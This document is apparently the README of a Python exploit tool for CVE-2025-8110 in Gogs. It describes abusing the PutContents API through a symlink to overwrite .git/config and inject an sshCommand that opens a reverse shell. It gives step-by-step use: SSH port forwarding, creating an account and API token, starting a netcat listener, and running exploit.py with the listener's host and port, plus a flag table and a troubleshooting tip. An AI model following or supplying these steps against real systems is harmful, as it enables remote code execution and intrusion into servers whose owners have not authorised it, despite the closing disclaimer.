An automated Python exploit for CVE-2025-8110 in Gogs. This vulnerability allows for Remote Code Execution (RCE) by abusing the PutContents API, which fails to validate if a file path is a symlink. By overwriting the internal .git/config file via a symlink, we can inject a malicious sshCommand to trigger a reverse shell.
Ensure you have Python 3 and the necessary dependencies installed:
pip install requests rich beautifulsoup4You must also have git installed and reachable in your $PATH for the repository cloning and committing phase.
Gogs may be bound to 127.0.0.1:3001. Use port forwarding to access the WebUI locally:
ssh -L 3001:127.0.0.1:3001 user@target-ipOnce forwarded, navigate to http://localhost:3001:
- Create a new account.
- Note down your Username and Password for the script.
The script uses the Gogs API to deliver the payload:
- Log in to the WebUI.
- Navigate to Settings -> Applications.
- Under Manage Personal Access Tokens, generate a new token.
- Copy the token immediately.
Start your listener before running the script, as the shell triggers as soon as the API update is processed.
nc -lvnp 5555Pass your credentials and the token as arguments:
python3 exploit.py -u http://localhost:3001 -un <YOUR_USER> -pw <YOUR_PASS> -t <YOUR_TOKEN> -lh <YOUR_IP> -lp 5555| Flag | Description |
|---|---|
-u |
The base URL of the Gogs instance (e.g., http://localhost:3001). |
-un |
The username of the account you created. |
-pw |
The password of the account you created. |
-t |
The API token generated in Settings. |
-lh |
Your listener's IP address (LHOST). |
-lp |
Your listener's port (LPORT). |
Note: If the script hangs or returns a
Read timed outafter "Overwriting .git/config", check your listener. This usually indicates the reverse shell has connected successfully and is holding the connection.
Author: TYehan
Disclaimer: This tool is for educational purposes and authorized security auditing only. Use responsibly.
